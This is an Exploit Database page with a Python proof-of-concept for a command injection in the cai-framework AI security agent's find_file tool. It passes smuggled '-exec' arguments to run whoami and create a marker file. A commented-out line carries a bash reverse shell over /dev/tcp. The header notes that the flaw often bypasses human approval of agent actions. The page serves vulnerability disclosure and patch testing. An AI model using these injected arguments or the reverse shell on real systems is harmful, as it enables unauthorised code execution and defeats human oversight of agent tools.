This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection EDB-ID: 52530 CVE: N/A EDB Verified: Author: BANYAMER Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-30 Vulnerable App: # Exploit Title: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection # CVE: CVE-2026-25130 # Date: 2026-02-03 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/yourusername # Vendor Homepage: https://github.com/aliasrobotics/cai # Software Link: https://github.com/aliasrobotics/cai # Vulnerable Version: cai-framework <= 0.5.10 # Tested on: cai-framework 0.5.10 # Category: Argument Injection / OS Command Injection # Platform: Python # Exploit Type: Unauthenticated / Authenticated depending on agent context (often bypasses human approval) # # # Usage: # Run the script directly (local execution ) # Observe command output or side effects (e.g. whoami result, created files, etc.) from cai.tools.reconnaissance.filesystem import find_file import sys def main(): print("=== CVE-2026-25130 PoC - find_file Argument Injection / OS Command Injection ===") print("Vulnerable cai-framework <= 0.5.10") print("This demonstrates command execution via malicious 'args' parameter\n") # ──────────────────────────────────────────────────────────────── # PoC 1: Simple proof – execute 'whoami' via -exec # ──────────────────────────────────────────────────────────────── print("[Test 1] Executing 'whoami' via -exec") malicious_args = "-type f -exec whoami \\;" try: result = find_file( file_path="/tmp", # Any readable directory args=malicious_args, ctf=None ) print("[+] Command output:\n", result) except Exception as e: print("[-] Execution failed:", str(e)) print("\n" + "-"*70 + "\n") # ──────────────────────────────────────────────────────────────── # PoC 2: Touch a proof file (non-destructive marker) # ──────────────────────────────────────────────────────────────── print("[Test 2] Creating marker file /tmp/CAI_CVE_2026_25130_PROOF") proof_args = '-type d -exec touch /tmp/CAI_CVE_2026_25130_PROOF \\;' try: result = find_file( file_path="/tmp", args=proof_args, ctf=None ) print("[+] Result:\n", result) print("Check if file exists: ls -l /tmp/CAI_CVE_2026_25130_PROOF") except Exception as e: print("[-] Execution failed:", str(e)) print("\n" + "-"*70 + "\n") # ──────────────────────────────────────────────────────────────── # PoC 3: Dangerous example – reverse shell # ──────────────────────────────────────────────────────────────── # print("[Test 3] Reverse shell example (DO NOT RUN UNLESS IN ISOLATED LAB)") # rev_args = '-exec bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" \\;' # find_file("/tmp", rev_args) print("\nPoC finished.") print("If commands executed successfully → vulnerability confirmed.") print("After patch (commit e22a1220) these payloads should be rejected.") if __name__ == "__main__": try: main() except KeyboardInterrupt: print("\n[!] Stopped by user.") except Exception as e: print(f"\n[!] Unexpected error: {e}") sys.exit(1) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.